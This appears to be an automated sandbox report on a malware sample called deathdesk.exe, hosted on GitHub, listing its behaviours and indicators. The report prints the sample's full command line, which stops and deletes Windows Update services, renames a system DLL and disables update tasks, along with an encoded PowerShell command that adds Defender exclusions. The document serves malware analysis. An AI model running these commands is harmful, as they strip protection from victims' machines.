hxxps://github[.]com/kazareworking/public_deathdesk/blob/main/deathdesk[.]exe

Analysis

max time kernel
150s
max time network
136s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
12-10-2022 11:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/kazareworking/public_deathdesk/blob/main/deathdesk.exe

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 1932 created 420 1932 powershell.EXE winlogon.exe
PID 1224 created 420 1224 powershell.EXE winlogon.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

deathdesk.exeupdater.exe

pid process

748 deathdesk.exe
1584 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

1316 icacls.exe
1276 takeown.exe
624 icacls.exe
1224 takeown.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Loads dropped DLL 2 IoCs

Processes:

iexplore.exetaskeng.exe

pid process

2032 iexplore.exe
1504 taskeng.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

1316 icacls.exe
1276 takeown.exe
624 icacls.exe
1224 takeown.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

32 ip-api.com

description	pid	process	target process
PID 1932 created 420	1932	powershell.EXE	winlogon.exe
PID 1224 created 420	1224	powershell.EXE	winlogon.exe

pid	process
748	deathdesk.exe
1584	updater.exe

pid	process
1316	icacls.exe
1276	takeown.exe
624	icacls.exe
1224	takeown.exe

pid	process
2032	iexplore.exe
1504	taskeng.exe

pid	process
1316	icacls.exe
1276	takeown.exe
624	icacls.exe
1224	takeown.exe

flow	ioc
32	ip-api.com

Drops file in System32 directory 4 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

deathdesk.exepowershell.EXEpowershell.EXEupdater.exe

description	pid	process	target process
PID 748 set thread context of 1768	748	deathdesk.exe	conhost.exe
PID 1932 set thread context of 1564	1932	powershell.EXE	dllhost.exe
PID 1224 set thread context of 1824	1224	powershell.EXE	dllhost.exe
PID 1584 set thread context of 1192	1584	updater.exe	dialer.exe

Drops file in Program Files directory 3 IoCs

Processes:

deathdesk.exeupdater.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	deathdesk.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	deathdesk.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Drops file in Windows directory 6 IoCs

Processes:

svchost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1260 sc.exe
320 sc.exe
1316 sc.exe
1200 sc.exe
624 sc.exe
1268 sc.exe
1384 sc.exe
296 sc.exe
1192 sc.exe
320 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1548 schtasks.exe

pid	process
1260	sc.exe
320	sc.exe
1316	sc.exe
1200	sc.exe
624	sc.exe
1268	sc.exe
1384	sc.exe
296	sc.exe
1192	sc.exe
320	sc.exe

pid	process
1548	schtasks.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 2018b0112fded801	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3607D5A1-4A22-11ED-A20B-4279513DF160} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000048ca5449a4d21846ba8a995ea0abd35a00000000020000000000106600000001000020000000976f06d334a0fd1eef119a5d9309553f257859e3d1df4b19cf736013e214b45f000000000e80000000020000200000005899bcaeb63e4139b79d711c2fca8a972d5c8d6066e4a4d0cb39875573687bcf20000000e8cc2d1c2f4accc5ef04bbb7acbc12f13b67f4f0c47584961247a8fc3ea7753a400000008a22b68146e0dd3cac95e6fd391d8402b816cecbdb90076eaad119d4866f9ca98500c9193fbbd076b2abe9911ffa973d2f57bc025a5cdcefdb4bc4c9f01c0c0b	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60b08d102fded801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "372339608"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000048ca5449a4d21846ba8a995ea0abd35a0000000002000000000010660000000100002000000038691b5d8ab88ea1e9a2a0db59080c6080894ba12f39f39425012005a8f16bcb000000000e80000000020000200000000f001efa81dde4a929dbd799bc56e0375b72da54bb077d5b427a4eac11d52b119000000094201c7947adfafb2b99fdcd822316b99d9b5e7443630b0b5242d454d7df1a0449e2a0687f95ac431c685151795a4ed92be43e79f4b5e674081c4748fa92937506dc74b059fb7d790af433154fe2071910ee7f4bd02d75c536c7b76bb11cf7aa78f37e6d7a63b1aca17deccc3402116fcdb889ad3534117e784293919cd3c00138e0467372d6b7ff7beb984c1cb104e440000000bb5a3f5704f126d62b99e2acfacbf933bb37c8f9d9298cc8ba415b58bc190097c2d01101fc6e131428ff09f6106ed0429247edfc2528a30e19d1c02950426456	iexplore.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

powershell.EXEupdater.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 4045a01f2fded801	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	updater.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	updater.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1720	reg.exe
1584	reg.exe
840	reg.exe
748	reg.exe
580	reg.exe
1192	reg.exe
1016	reg.exe
1976	reg.exe
1152	reg.exe
1316	reg.exe
1552	reg.exe
1576	reg.exe
1640	reg.exe
1612	reg.exe
1932	reg.exe
1576	reg.exe
1144	reg.exe
928	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exedeathdesk.exepowershell.EXEdllhost.exepowershell.EXEpowershell.exedllhost.exe

pid	process
840	powershell.exe
748	deathdesk.exe
1932	powershell.EXE
1932	powershell.EXE
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1224	powershell.EXE
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
320	powershell.exe
1224	powershell.EXE
1824	dllhost.exe
1824	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1824	dllhost.exe
1824	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1824	dllhost.exe
1824	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1824	dllhost.exe
1824	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1824	dllhost.exe
1824	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1824	dllhost.exe
1564	dllhost.exe
1824	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1824	dllhost.exe
1824	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1824	dllhost.exe
1824	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1824	dllhost.exe
1824	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1824	dllhost.exe
1824	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1824	dllhost.exe
1824	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1824	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedeathdesk.exetakeown.exepowershell.EXEdllhost.exepowershell.EXEpowershell.exedllhost.exeExplorer.EXEpowercfg.exeupdater.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	840	powershell.exe
Token: SeShutdownPrivilege	1768	powercfg.exe
Token: SeShutdownPrivilege	1628	powercfg.exe
Token: SeShutdownPrivilege	1676	powercfg.exe
Token: SeShutdownPrivilege	1184	powercfg.exe
Token: SeDebugPrivilege	748	deathdesk.exe
Token: SeTakeOwnershipPrivilege	1276	takeown.exe
Token: SeDebugPrivilege	1932	powershell.EXE
Token: SeDebugPrivilege	1932	powershell.EXE
Token: SeDebugPrivilege	1564	dllhost.exe
Token: SeDebugPrivilege	1224	powershell.EXE
Token: SeDebugPrivilege	320	powershell.exe
Token: SeDebugPrivilege	1224	powershell.EXE
Token: SeDebugPrivilege	1824	dllhost.exe
Token: SeShutdownPrivilege	1368	Explorer.EXE
Token: SeShutdownPrivilege	1204	powercfg.exe
Token: SeDebugPrivilege	1584	updater.exe
Token: SeAssignPrimaryTokenPrivilege	872	svchost.exe
Token: SeIncreaseQuotaPrivilege	872	svchost.exe
Token: SeSecurityPrivilege	872	svchost.exe
Token: SeTakeOwnershipPrivilege	872	svchost.exe
Token: SeLoadDriverPrivilege	872	svchost.exe
Token: SeSystemtimePrivilege	872	svchost.exe
Token: SeBackupPrivilege	872	svchost.exe
Token: SeRestorePrivilege	872	svchost.exe
Token: SeShutdownPrivilege	872	svchost.exe
Token: SeSystemEnvironmentPrivilege	872	svchost.exe
Token: SeUndockPrivilege	872	svchost.exe
Token: SeManageVolumePrivilege	872	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	872	svchost.exe
Token: SeIncreaseQuotaPrivilege	872	svchost.exe
Token: SeSecurityPrivilege	872	svchost.exe
Token: SeTakeOwnershipPrivilege	872	svchost.exe
Token: SeLoadDriverPrivilege	872	svchost.exe
Token: SeSystemtimePrivilege	872	svchost.exe
Token: SeBackupPrivilege	872	svchost.exe
Token: SeRestorePrivilege	872	svchost.exe
Token: SeShutdownPrivilege	872	svchost.exe
Token: SeSystemEnvironmentPrivilege	872	svchost.exe
Token: SeUndockPrivilege	872	svchost.exe
Token: SeManageVolumePrivilege	872	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	872	svchost.exe
Token: SeIncreaseQuotaPrivilege	872	svchost.exe
Token: SeSecurityPrivilege	872	svchost.exe
Token: SeTakeOwnershipPrivilege	872	svchost.exe
Token: SeLoadDriverPrivilege	872	svchost.exe
Token: SeSystemtimePrivilege	872	svchost.exe
Token: SeBackupPrivilege	872	svchost.exe
Token: SeRestorePrivilege	872	svchost.exe
Token: SeShutdownPrivilege	872	svchost.exe
Token: SeSystemEnvironmentPrivilege	872	svchost.exe
Token: SeUndockPrivilege	872	svchost.exe
Token: SeManageVolumePrivilege	872	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	872	svchost.exe
Token: SeIncreaseQuotaPrivilege	872	svchost.exe
Token: SeSecurityPrivilege	872	svchost.exe
Token: SeTakeOwnershipPrivilege	872	svchost.exe
Token: SeLoadDriverPrivilege	872	svchost.exe
Token: SeSystemtimePrivilege	872	svchost.exe
Token: SeBackupPrivilege	872	svchost.exe
Token: SeRestorePrivilege	872	svchost.exe
Token: SeShutdownPrivilege	872	svchost.exe
Token: SeSystemEnvironmentPrivilege	872	svchost.exe
Token: SeUndockPrivilege	872	svchost.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

iexplore.exe

pid process

2032 iexplore.exe
2032 iexplore.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

iexplore.exeIEXPLORE.EXEconhost.exe

pid process

2032 iexplore.exe
2032 iexplore.exe
1880 IEXPLORE.EXE
1880 IEXPLORE.EXE
1880 IEXPLORE.EXE
1880 IEXPLORE.EXE
1552 conhost.exe

pid	process
2032	iexplore.exe
2032	iexplore.exe

pid	process
2032	iexplore.exe
2032	iexplore.exe
1880	IEXPLORE.EXE
1880	IEXPLORE.EXE
1880	IEXPLORE.EXE
1880	IEXPLORE.EXE
1552	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

iexplore.exedeathdesk.execmd.execmd.exe

description	pid	process	target process
PID 2032 wrote to memory of 1880	2032	iexplore.exe	IEXPLORE.EXE
PID 2032 wrote to memory of 1880	2032	iexplore.exe	IEXPLORE.EXE
PID 2032 wrote to memory of 1880	2032	iexplore.exe	IEXPLORE.EXE
PID 2032 wrote to memory of 1880	2032	iexplore.exe	IEXPLORE.EXE
PID 2032 wrote to memory of 748	2032	iexplore.exe	deathdesk.exe
PID 2032 wrote to memory of 748	2032	iexplore.exe	deathdesk.exe
PID 2032 wrote to memory of 748	2032	iexplore.exe	deathdesk.exe
PID 748 wrote to memory of 840	748	deathdesk.exe	powershell.exe
PID 748 wrote to memory of 840	748	deathdesk.exe	powershell.exe
PID 748 wrote to memory of 840	748	deathdesk.exe	powershell.exe
PID 748 wrote to memory of 1964	748	deathdesk.exe	cmd.exe
PID 748 wrote to memory of 1964	748	deathdesk.exe	cmd.exe
PID 748 wrote to memory of 1964	748	deathdesk.exe	cmd.exe
PID 748 wrote to memory of 616	748	deathdesk.exe	cmd.exe
PID 748 wrote to memory of 616	748	deathdesk.exe	cmd.exe
PID 748 wrote to memory of 616	748	deathdesk.exe	cmd.exe
PID 1964 wrote to memory of 624	1964	cmd.exe	sc.exe
PID 1964 wrote to memory of 624	1964	cmd.exe	sc.exe
PID 1964 wrote to memory of 624	1964	cmd.exe	sc.exe
PID 616 wrote to memory of 1768	616	cmd.exe	powercfg.exe
PID 616 wrote to memory of 1768	616	cmd.exe	powercfg.exe
PID 616 wrote to memory of 1768	616	cmd.exe	powercfg.exe
PID 1964 wrote to memory of 1268	1964	cmd.exe	sc.exe
PID 1964 wrote to memory of 1268	1964	cmd.exe	sc.exe
PID 1964 wrote to memory of 1268	1964	cmd.exe	sc.exe
PID 1964 wrote to memory of 1260	1964	cmd.exe	sc.exe
PID 1964 wrote to memory of 1260	1964	cmd.exe	sc.exe
PID 1964 wrote to memory of 1260	1964	cmd.exe	sc.exe
PID 1964 wrote to memory of 1384	1964	cmd.exe	sc.exe
PID 1964 wrote to memory of 1384	1964	cmd.exe	sc.exe
PID 1964 wrote to memory of 1384	1964	cmd.exe	sc.exe
PID 616 wrote to memory of 1628	616	cmd.exe	powercfg.exe
PID 616 wrote to memory of 1628	616	cmd.exe	powercfg.exe
PID 616 wrote to memory of 1628	616	cmd.exe	powercfg.exe
PID 1964 wrote to memory of 320	1964	cmd.exe	sc.exe
PID 1964 wrote to memory of 320	1964	cmd.exe	sc.exe
PID 1964 wrote to memory of 320	1964	cmd.exe	sc.exe
PID 616 wrote to memory of 1676	616	cmd.exe	powercfg.exe
PID 616 wrote to memory of 1676	616	cmd.exe	powercfg.exe
PID 616 wrote to memory of 1676	616	cmd.exe	powercfg.exe
PID 1964 wrote to memory of 1720	1964	cmd.exe	reg.exe
PID 1964 wrote to memory of 1720	1964	cmd.exe	reg.exe
PID 1964 wrote to memory of 1720	1964	cmd.exe	reg.exe
PID 616 wrote to memory of 1184	616	cmd.exe	powercfg.exe
PID 616 wrote to memory of 1184	616	cmd.exe	powercfg.exe
PID 616 wrote to memory of 1184	616	cmd.exe	powercfg.exe
PID 1964 wrote to memory of 1584	1964	cmd.exe	reg.exe
PID 1964 wrote to memory of 1584	1964	cmd.exe	reg.exe
PID 1964 wrote to memory of 1584	1964	cmd.exe	reg.exe
PID 1964 wrote to memory of 1640	1964	cmd.exe	reg.exe
PID 1964 wrote to memory of 1640	1964	cmd.exe	reg.exe
PID 1964 wrote to memory of 1640	1964	cmd.exe	reg.exe
PID 1964 wrote to memory of 1016	1964	cmd.exe	reg.exe
PID 1964 wrote to memory of 1016	1964	cmd.exe	reg.exe
PID 1964 wrote to memory of 1016	1964	cmd.exe	reg.exe
PID 1964 wrote to memory of 1976	1964	cmd.exe	reg.exe
PID 1964 wrote to memory of 1976	1964	cmd.exe	reg.exe
PID 1964 wrote to memory of 1976	1964	cmd.exe	reg.exe
PID 1964 wrote to memory of 1276	1964	cmd.exe	takeown.exe
PID 1964 wrote to memory of 1276	1964	cmd.exe	takeown.exe
PID 1964 wrote to memory of 1276	1964	cmd.exe	takeown.exe
PID 1964 wrote to memory of 624	1964	cmd.exe	icacls.exe
PID 1964 wrote to memory of 624	1964	cmd.exe	icacls.exe
PID 1964 wrote to memory of 624	1964	cmd.exe	icacls.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:476

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:468

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
PID:756

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:952

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:796

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:872

C:\Windows\system32\taskeng.exe
taskeng.exe {1387719C-19BA-4049-B551-4EAC7600EF68} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
- Loads dropped DLL
PID:1504

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAaQB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYgBjAG0AdQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBpAGYAcAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB6AG8AawBwACMAPgA="
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:320

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:112

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:296

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:1316

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:1200

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:1192

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:320

C:\Windows\system32\reg.exe
